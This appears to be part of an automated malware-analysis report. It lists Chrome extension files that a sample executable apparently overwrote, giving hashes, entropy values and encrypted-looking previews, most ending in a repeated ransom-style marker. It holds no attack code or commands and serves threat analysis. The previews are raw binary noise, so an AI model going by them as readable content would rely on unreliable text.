                                                                                                                                                                                                    MD5:932A2906E8BE566E2354A2DF3A742BC0
                                                                                                                                                                                                    SHA1:B73B8F059AF3B256F4CE33E47B43CD4867DFAED2
                                                                                                                                                                                                    SHA-256:AE3212D77807701C961AA6CBD99C2EB1DB131749988B1AAEB344A06F16A08F49
                                                                                                                                                                                                    SHA-512:8C8C11747A8EB4262D884C62F9712EE99C52B370CFA9ABCAC32D885A4D363DECCF3CFC7F69CFE3B4CFA378CF444F4706F1604474C838DF8DFC3169E0E9A3FF74
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: C....zEn.kP.B._....'..~MZ........p...;W_....B"P.u..g...../.>.s....Q...]...Ma .H.-..Z_|>...g..........?..K.0....G}..*A..H[a...M..k........pUbC!...J...D.[k.fO#..|q;...XT.ed.S.pp...'..f7.o...8...|:cY..H.r1..9m...E...*.q.N..j.....k....tds.<.f..C2.[.tN...J.$..L..!......[...].oY=j..P.,.j.E......yP...r...Qc..9x.M..\......;..7f.m.......QZ........0O.h.&a...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_TW\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):451
                                                                                                                                                                                                    Entropy (8bit):7.459959288686921
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:NStTS3yRQS3/eH2YMZl8zgio8HDz95scii9a:NoSiPmWHL8Zo8jXsbD
                                                                                                                                                                                                    MD5:C458CDF579A0A42FF6FB8BACC47B6792
                                                                                                                                                                                                    SHA1:D4AE20C70E1AD3AD350439EBD6A8DB8C48AB8C34
                                                                                                                                                                                                    SHA-256:DAAA058858E0092CC276575AB1DF45CCB97A084F4D54D948FF9BAB7CDEAE5257
                                                                                                                                                                                                    SHA-512:D6CFD74CD31D85BF41A6F63505F179C47DB02A40D989467F3697AF267B873075D1FC47A9AE91C882D623C084CEF041BADF52E1F2E0520B788A7F52B54ED1EB75
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .*...o...p.i.T.-..............P..H.Xh'y.v*.Z..s...T....@..[&...#+:..r..rq.-D<..Z.....8yv*(.Y..^W.X...S.....n.F.r}....Z.sF.(p.B.,*.....#......s...];.k...k|..9.. ..{;.]&.D.-...Q.3.F.N.....([..?.....D29e...Ey?^.H.a..go.&@F...s..F...M....X...m...R>s...`.`..i|.6...........e.P..'w...3..x..1.....c2.J.s.._...w8....!QjKF...e.P....:..:.l.]D.#.S..].K.@d..$...o...(3...s.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\computed_hashes.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):681
                                                                                                                                                                                                    Entropy (8bit):7.674356919929472
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:ovExYU1GJE6miCye+npslJ6/BofEV52yX6GjehfVqpCfgscii9a:w3LmXy3CTSoE5f6G65Vq8fgsbD
                                                                                                                                                                                                    MD5:97F85755246DBF29D4CF24981663A800
                                                                                                                                                                                                    SHA1:E8A20FC3A39132DBD998F53DA55BEF68489DFF6E
                                                                                                                                                                                                    SHA-256:A8FAF512B6D56B2F1A8DE675CB035BBADC45E86C41F5129DD267B3537968F079
                                                                                                                                                                                                    SHA-512:B08B1E3C50516D0A559F7FE780138C4488A4ED588CB407015B9B319174C1131AC786667E2F26A7CF44560061CB6B92DCC75C6C76EFADC720C6C1B77CADF1CEBC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .dV.K........I......7=....q.?[..Q.9.q........N...7....u.b_.28v.k..J.k...R..._/...!&.M..pM5.}O.A...X..H)...O..Gd...W....T......FQ).r..{.c..P.....H!{..f(..4..'.m..dx..k..;`._=.%U.y..B4.H...._..'.G..b..G..7....2...K..A#.xL..^L.v.BG..lG..Q.0.T.MDEF-/.U.........K.!.H..i@..)~..N.h....zI`.......y.jW..k...Bm..2.6_.d..ag..lb...uo7.$.o...UW.~[.:. .b(.H.B..2..l.@V...A...G.....va..../../.zZD<..uQ.....`.;E......i....O.i.s...-.`....K=..<w.zq..=).r...k/H.j.I..j.....N3=..W7.:....V..1...wQ.wP......4."..#.yL..#..r.gY...c+.j..z..5. ..>.d...&.m[sI.-.....KVp3.OZ.w..o..6..$...G..;.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\verified_contents.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7239
                                                                                                                                                                                                    Entropy (8bit):7.974553036317335
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:va+ZIn8LyxPFhVrDtbIJTscSmOfTaMwQ5kSkDy:SEI8GDJiTscSlhPmSkDy
                                                                                                                                                                                                    MD5:E819B6C7894082AD073D86E34B25743B
                                                                                                                                                                                                    SHA1:40C417A5DE0887B3667F465751057988E222302A
                                                                                                                                                                                                    SHA-256:3FBE3000B7A3B7CB4227EFBEF24B69B00D2EDA39EF094A5EAD3C87D266428657
                                                                                                                                                                                                    SHA-512:67988AA521A34871A765B99F2CDBFD3D8612483BC092EE2D360BB7DF419218EE6045210059D76F46FB7851397A68E5AF65A54D54EA3C3331EBCAA3FD58E24219
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..\.2.2z.O..?[r.....^.9Db.taU....o.c-....T....!Hcl.^..^.i=`..L.....ez.0.".T. .8..S..[...p5.=.....QRrz....O.C.r.....-.Q..W.:H+Z..)....>.....v...`..N..P.iWLg....R...B..y.~AJ?..E7......y..S.9z....3....gb..nM..0....O...9+.,]>....6W..|f.P..0....c"."..S..r.h.I....0.....B.`..2....y....%..f...c...lC..mq...D...Q..-......c_..........5.x....O..g.).....+.=T.A1..j.....qE..Q@7,.........Z.W/....wOD..sy..YS7.\.76.f.O.p4.{..9...<......A~.$.-"....gT...O.DK..:......`..F|........Z..e._@..Q..7....6.8..........;....9;sd...A.d...D.u.+...p.VsEY.S.G..&}....9."V..?.(.......#.P....#..v.%..?.o..js.............?<...!Tf..............M-H.....7......p.0S6.K...!b..@.....Q..........t./.v.....m.o..|.....m.#jz2..Yh,;k.+.\>.....D...d...L.B..pD.eh..%..Pxy....Cg|.4._...y.tB..&.....$..C.9.#.N.....m..<6...T.R-.Z..7H..W.<......5[.v).+.....59.N.LCh.....h.NZ....Td./..@\9>..TS./..=+.........m..v......b...G.=...]c.Im...}.L[?.Z4..D...~].8.o...`...r#...~,..>.....)s......T.)..^..z..<m...0.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_128.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3542
                                                                                                                                                                                                    Entropy (8bit):7.946883862847902
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:RrOTyweRNyuTtbcA1DJVbB2vQtgR3PjMjpK:Z0qNv91/bBwx3PjMjpK
                                                                                                                                                                                                    MD5:5040CFF7D3133564AA82029A488C3737
                                                                                                                                                                                                    SHA1:0369423A943569F9C8D20DE3A5FB45C3AC9D6AA9
                                                                                                                                                                                                    SHA-256:9639A8AD79186C911277E3878E531A0B3B770CD191B02CA2F1959EA1DBCDDA8C
                                                                                                                                                                                                    SHA-512:DC8BBD2073D3F31262D2D1D50DF57358CD215A506E80D95A6C80A6D1D2CC7AE785C3E1E93282819D07198CBB63799F592152BFE8F582A18416EB45E4DF7899DF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: bMv .....+.vo.p...W...O.b..G>dHP.,c.a/.R.c..T`.}.....$.(.R..g.CgOR..V...u.....N.c.%...u..I.w<Z.\..6<.?.8..k8...b3.H...|x.....3....x...A...xo..a,...@.F...oG..,..^.[...%.q...q.......r...:..#.U.h?.L:Q.<..l.........o.m.Z..D0.I. .d!.\.V...3..Y.......%....!B_...F.....<.6......=+l K..j.]..g:..|-..|....b...F.5....J..pu...K.@l..^..K.. .......?..../....UO...RI..W-.dt.9x1.r*.)P..s..Bqc..:.y..3.I...{8.e.v.. ..ST^7Xxm...M./#...W.*.j.Z.a.io8.q.0..vBPnG.g|....rH.b#K8R..u|...G...kQY..w. q.Z,k`...6Rog.PI...n.....m..[-.rb.T..&......{......C...7.{...Eo...@.:.wF....t.f...._\.&.......5Q..=.....d.>e5.W.NJj. ..1&.>.M......D..........f?.W#.~R...........Au......)..{....n.qy..Z..t.J.`..o..T.......s.zX....b....^L. {~#,.i.W..6.R..;m2.....3...._. .n'...."..#'....T<.(=..S.@O.D{}....Z..uIM_....[,.o.\..o.&<....F.D.5..1...@_*..U1.......E.w?M!./:j..4[...W..]8!..$z;\......`..Q......%.|.z...]..;.w....S...c]Hj.../h._.b.......g.q:......Zb.D....m.f...h...&?.i]....c..oo.6\.vQ.9<.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):472
                                                                                                                                                                                                    Entropy (8bit):7.479262177888722
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:hu6oKAE6DpCiHWdBT4lSebQPvAOOnDGK/UJ05cii9a:hu6oE4Ui2dl4lSiWv5cAJibD
                                                                                                                                                                                                    MD5:A2E900B16AA67ED5F90D0EA74A52D315
                                                                                                                                                                                                    SHA1:6A9036D5A415F8D749F618CA638319BC32A0FFF7
                                                                                                                                                                                                    SHA-256:9CC8BDD46481AE950ED034D28DF6066C493ED37EC706DA9024EDD96B7465ACE2
                                                                                                                                                                                                    SHA-512:D5E75CED63091CE94839C03337959469B40831B63E4209EF28BB87B827E8C4EAF81E642F8A5A432C31B0D342F6A63A72FEA7D112D6A6BE39E104FE559C275517
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: '..Od.?..\........9.V3...Hu.R.8.0$......`.*.M..c.@...j.f.e<.........'.9...\6..r....E..\E..*....}...Uv...(.[Q*p...N.m.......... .....w.....b...$:E.5.J.)'.#.Ev.*..\..i1...;.....g...Ut.[ErHe..u.`J..L.D...N*$.X}.....w%7#.m.0d......O.i......O...W./..Cx5.._5.&...w..Z.).+..7).....a..W.f..:.`t..Fg..s.I.B.>.).j.[.k..f...k..ZB..u..,....X.}.G.56.7..Ed4:p7.y....ln,yE....P.z.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\main.html
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):421
                                                                                                                                                                                                    Entropy (8bit):7.441702426789041
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:J+fYSqoHtLEmSDfhFEIXaPtFMm0BZjnvnWcTJ0YBbQ9pJi75dExcii96Z:J+wSqoHtLEjDcIXO3MBjvdvIXcii9a
                                                                                                                                                                                                    MD5:D6606128798E0F0A47A5E083A72C7BF5
                                                                                                                                                                                                    SHA1:D15ADFD5DE0CD70ADB3081AD1126C9104A543C31
                                                                                                                                                                                                    SHA-256:1976416DF8742E11E61979B912FA48EAEF6EBE1DB6A1D757FCC5A99831052063
                                                                                                                                                                                                    SHA-512:E9AB3865BDF3F3F7113E1B41976861DDF9323DECE369E4F56AD9B5246347B31C2398099BA4719F5DE99BF8C4F9F158FE777545D904745EE9660AD986CAE825F6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..8..bek.i..k`G6Y..?4\C.ns..-0?..j...`;.........U........T......./..h..6,.5m....*.....[m.[~...+.1..Uh..Z{.[4..o....K...uk.r...~..K......6.(Z.(pU....D.L.R..(h.d...~.h.......S.....R..1.i.X...V.?..M..ctve-..e''. 7.fBE...#....v4...Q.....!....!.].M.....g.P..=............I...$....Rj.8.%..U..9BJ...8.....=#..X.."....N..KPJ.>./.....B.H5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\main.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):420
                                                                                                                                                                                                    Entropy (8bit):7.398608373152924
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:uRuoMaszztO/7FoTtnZ5wG0C18s4yBQBHd6700Xtcii9a:QeJ07yVbwG0Cufd5v09bD
                                                                                                                                                                                                    MD5:34BC017BA47FA98088291B558842F538
                                                                                                                                                                                                    SHA1:9FA11E010109149CD96D11C467481A5595684955
                                                                                                                                                                                                    SHA-256:A92A4D391DB876E961E968CE607B242517F3BB33860972958D20988AE2531725
                                                                                                                                                                                                    SHA-512:DDDAD303DA24EBEE02C56132C9DBC3FED3364F2FE7EC0ACFEDFC43301D9FD3F9949370123181083B01555CC7F6FBB7041CE87AFC084EA65335F09FB734677EC0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: `2......n.T..{..g=...A.e.O.'.;..?.G.d?KMELjTj..X]..|.....)...]w1..q.x.....k*..o...tE.G..n.un=...?. .dK...b0..FSog.......TW.g..Q#..1.....b=...~.=,...z....5....d:G.....).....U....&I......."...+.s..)pL.5.......VUC...x.:...e.@t=uX.Y..w...:.3..rr..x......._H...Zt&.2.........PNeD.^...r~..... ...\..Fr..O....ES.P5..o..gUE2.|.8.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\manifest.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:DOS executable (COM)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1055
                                                                                                                                                                                                    Entropy (8bit):7.809307004251943
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:8W/VrNcxSoF0pIXn0/5rbmz7GG4INnw2pzv5Edn8E15k5lVbD:t/VhKtHkFbmzl1nfpVEdP1mFD
                                                                                                                                                                                                    MD5:11B52D9616A6A5F2EBF610E402E37951
                                                                                                                                                                                                    SHA1:61ECACA56AD2CC82D7468F102DAE4ED80489D925
                                                                                                                                                                                                    SHA-256:487770A09C6207D0EFA80B487A34251E97F4D07ECC8EC1C5B67C3B5C8722718E
                                                                                                                                                                                                    SHA-512:3345FD5884986B195F68A64E6EC4359223FE8D7E208514558A9D8E57A20D48277D94F466B5BC7CF86B8917F10F69A4C0635A81B45A62B6E695F979EAF37D8E2C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .,.-...T.s,...o`D..... <.....I.q..k.X..K..Sq..U....,..4>.F..v..`s.8.M...d..........m....d...=..q..!..w.v7". .9.[.f./.O.h.V...pQX}E.!'.2}.#a...p,.g~.m,|.m.]_fF...=...<?.m..k.q....d[..<.v<..%O........H.5=,e..ueY.\@...U...3/J....d.....)..*Y..jv...+>..2~k..d{.3m..l......._PD..fg-.f.......|q...5U..+.3fq(.u....R5o?..>......o8t....8.+...N..W..lw.x....."..........o..A{.../.o.. t.aU.U.i...v.HJ...y&........m.....D...$.n.o. .....V....,ztm&?.a..c..TcF.|..E;...8|H....:ph.I.q.]....]b_..Hs.&.L...G.I.ti..{.Z..v]6...@....S=..g,...-j..y..3.-u.!...vF..N..]......l..%56c.(............e.1ti......k.i..t.\.1.*x...'+...;.&s..y&....n..?..4.k.3Q*.,Mw%.$...\b..e.iK...Y.;XA.......Cl..... ..1o.b.....q8P..X.6v%.1.....{...........K0..G.I^k..0...B...~\.i..Z..vj.~...O..r...4....&....0..p.]l.z.0x...rG..h....3.+2|...H.i+0&.&Xb^_c...*.:..;A.~..x(.....G. .j.}4.}... =P.m ._..&.bD.......!.Kj...}.......l..b<./.%Z....\.y.{..C.....E..c.?.?.R.(..W..=.1..f1.>.N.5VPEIoxEWaaB5A242LGR5OT
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\128.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7034
                                                                                                                                                                                                    Entropy (8bit):7.971335090674733
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:qrTf6Zbmw0T8lE3jwcD3+z0ZA2Jg1fECPiinpqh7mFRFHonPYdUZ79XkS:qHyZbFm3j33YH2LUPlHijZtkS
                                                                                                                                                                                                    MD5:7FC7484120905F4E8B051AACE289BA71
                                                                                                                                                                                                    SHA1:47C44F579C2191DDB848461A765E09E13128B9E0
                                                                                                                                                                                                    SHA-256:C0E4EE5CBEF664996AACAD1B75947D12F53CDFD8DE278A304C163FC068E150AD
                                                                                                                                                                                                    SHA-512:6562537AAA7A6D43AAFA4514A416E7E6B2F04159648108B1B63C8B32739108B2F75D8DEAF4B112996D747D77DB31B338523E27F0D1E805BE7FB554B93B009EE7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: c.:.r.........sN.........g8p..U(...F.....|V...Y;}......A......'.t..H(J.Rx.pJI..B.h.h..<.T.i3..3b^..jc.'..)=..!0.lN..I..I...g...Fx.]..a..8.h.:.....:..XE............n.G:...m..../o..*C.v.H.[...a.../.,i....Xm......[KB...........]>.l..kAy...;b.)..W.+.W..{b.1.....;;.Q....D...7{U...Wj0.].h7.K..C..F.U..P...J8..rY/..J....q...MH...6..-j..+....N....m.j..#y..$.W..rI.Si....kY..!....*cW......j-I...4.PL.^Eu..>.X<s6.-...m}.Z......V....SB....Y...Aw....6G.h>...+4...9^.......y.ue.^".....^Q.mnN....s!}.@.O..Eb.)6..-v`/...|....y.._q.a.<.J...?..d.k"...JYS( S.Wu[Y.*Ar{.kl....l....7.)TBU..!.& ...5.......~..,c#.u.0#E.X2.......*..6....~.j......unj.\..-..@...\.?.V[...u.......wh.m=|.a...}...d.....F[..c..HY..7..8K1r%.......u.;C.......W...@.K..^.].$.....M.+..q2.....A...........SIeD.l.c.o............M..7.Za...5..i.l.I..ry..\......ne..H..5..o.......C8VF$...ue\....{.vk.%.....>.......m....b.}$......}....s.)31Woc.2...K.U t.trh.d..=.6.$.g...!..5F........#.Y......u5J....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ar\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):607
                                                                                                                                                                                                    Entropy (8bit):7.6505980650348535
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:nShFU0TI+TqEtZRJ6j4/W+HnsagENSfovLAwGWiucii9a:nShVTI+JtDJI4PHs6NSKvbD
                                                                                                                                                                                                    MD5:BFA51C49CAFBEC02AEB61F43556F1761
                                                                                                                                                                                                    SHA1:C5DF48C9BC28BE967511DF67595C356174F0C932
                                                                                                                                                                                                    SHA-256:67141DEBE1CF1EA0D2A6B019F6A1F7016EE1395F86F087E6F3CB8D4411B321BA
                                                                                                                                                                                                    SHA-512:822FA965B91D3F39C9C6F164D68A5E4BCCCBDEC89DB13494998ED786364F8BB3CA3353CC6F8D7C5FDC75E8E886B1347BB0B189111E08612553DA1957CA79BF25
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..X.F.$L....)5.e..d...g...(..k....n......_.;4Nw!.>..H.r*..5......#......y..nj...?....si.z.J..X.mNU\$.s.v.... . .hC.s....+...'......5..(....]dT.x.).CRK.=.Z...N2.[.e..ak..'..Ek..?.`.W.gpFY.k.X..+doH.DNIX..a.7.K......=......E`.>P1Op.R..k.N.....L...j.5...%R...O...-..+.....b]#...2...~.w.*.N.?......8.....Ho..nS......[N.u.M...<ug.../1..`..fm......;....4..c.m6.......o.&4l:.....,.+i..f.s.D%P...8....k..g%2)L.]...o~.Ve.y.].!\]\.SS..di.....{...<....s.Y...A.ys.B.a...#.....e_t..H..x).#2uu...`....[h...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\bg\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):648
                                                                                                                                                                                                    Entropy (8bit):7.621561483385326
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:a12rqH7GNq7w/LSvpec1nHzKvVKRgbuCD6EjjQTp9OIWXcii9a:ubHwJ/GhvBzyDNjjQRAbD
                                                                                                                                                                                                    MD5:6D54DC1D61E4C79B1BE97E067BC92FB4
                                                                                                                                                                                                    SHA1:A6BE723328D80DE08026DC51B5E4AFFB5E098517
                                                                                                                                                                                                    SHA-256:AF026806CA0EA1B4AEDF84953D33676DB3D5C5D151971391E4B2E5E7553CC219
                                                                                                                                                                                                    SHA-512:1D51F36223E8A8DB7A4CAACE21C7A3A35165E151BDB7B3B74D61779DC64426DB8E9E0343A905D6BCD43AADE62EB505279C311947933CFC42F317C46FB1C3312E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: &x.:.l./=..H.<_..^.....S....=.....<.}d...<2m...j.-S..,....vfx.x.........|.*2.........!....d...u..2WiO.<'d.D.r.Gd\.<.....=........W..)..nZC..p..C.....q...S.x.r..O.E.D..C^f..,...p...WUs...".w..N.:...V...(V......8..,.A+..R/..5.g...z.hq].7....@..=..q..$.....2Z..I...kn_.X...|.............|..z.}o|...[.`M|..!.@..W.1(%J...p?h.fX.eA.h6.k........B...k..:G...D._z..O(....|......V?..`....hlK.U(.....S*.Qe.I.W.J.\'.%.Y8..G.k......`... .J7..].-...@]:..A..I.`8..g}...+...!C.......*."..E..P..N+....5J..6.1y.A\.P..8..s.0.D[.....N.....]..t.%.:..Y.E..8.......t..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ca\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):594
                                                                                                                                                                                                    Entropy (8bit):7.619752937471447
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8g+5nhUc/ZE/9O+DNywUvQEGvik2N3G0VaURQ4gFFPcii9a:8R5hH/6/AHwPj6ks3RCHFPbD
                                                                                                                                                                                                    MD5:69BA02A05D9AF5421B53FC8FD0AF3C02
                                                                                                                                                                                                    SHA1:A588474DCA0B3F3B9F65C1A93293B1F250B4B638
                                                                                                                                                                                                    SHA-256:B26865945A3929283379EC103B4D0B11F354EA1C19C0C4148AD13EE62762BC57
                                                                                                                                                                                                    SHA-512:0B8D915248BF553D9CF6128CD8054AA869BEF2E2C83895053CCAFA1A03C1CF9624BA1C60C709E8BDFE2856CE4E49FEE8602AEC5C7EA6863E1696F4F3BC7A80C3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...j...d..`......z..~...T..l.M...J8.Y.M...G..M.._..6.!..8}.]d.........d.}..)N...m.m!....q.u%....E.......!..-..e>U.3.8..VRR..s.l..[&G._.t...4.+n.z<......^Gt..;.@Y..5..........3.j.........@j..f6.8O.0...R.c..25.#.........9.G.'.s...q...FW.../..?(..........8.=.....,.M...........i.KY.<.P.in.:........[..w._.. :..5.Q...I..?y....J.........a...&........Z.D.!.....;-..o.5..?q.\r...[..G.:...$..3O...,.x.9*..P.ING.Y...@..Vw.q'..X..../v.1..o.)....Q..n..FJ.Q.|....a.#.Y<.{.4;O...FSO..F(.5.n........|a..w.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\cs\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):588
                                                                                                                                                                                                    Entropy (8bit):7.574790343115444
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Xvny7cXGNFU8Xg0ONTKMgqIPMTo3mjaK5mGmucii9a:qqmFU8C+RYOmKGLbD
                                                                                                                                                                                                    MD5:A47CBCD0D921B0125BE4853BED11D459
                                                                                                                                                                                                    SHA1:2F79B9C1449E240263D7CFB0EB4B1119609DE19D
                                                                                                                                                                                                    SHA-256:5EB0CA3418B73F4D1C6FA8CA3CA0F65D7A7C68BC00781F226A780E3A387C93DB
                                                                                                                                                                                                    SHA-512:57890BA8110593483D086EC0ABC99021D69456C9FCE1CB3B7D13C9A066C2848512AEF21693C8BFA90C79CE047E9FF6A724BB50C8B6646075ECEA6FAEE137BBA4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...E[..qu.u._..3r..B.|Do.,...i..&8.nI.N...`....k^.^.JQ...*+H.,gW....5...{.K..........d....=.M.LbM....L.vL^.....d.Ns...=.3/.8..m4.Ws.o..g<'..U3Y..9.K..i...W....S.w.<.i.Y2....\!EQ...0KX.....u.;.a.0....}.%7.9nVY.l.......9.._..*........{.......N._.0..Y..!.&...b.........K.D9...lg.t...>...axTpr.!.o.6E..:..g;..:...B......m.4..._....-q\..(..].n7?....\,...fz..o.p2.4yG.h*<.c.S.nj @..-..L-.]C...D.a...[K5..P...."8_..k...s:..l.......G...[`.)...=..;..,.]7.z...@..#(..%......$`."..Iq.7....^...gF5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\da\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:COM executable for DOS
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):572
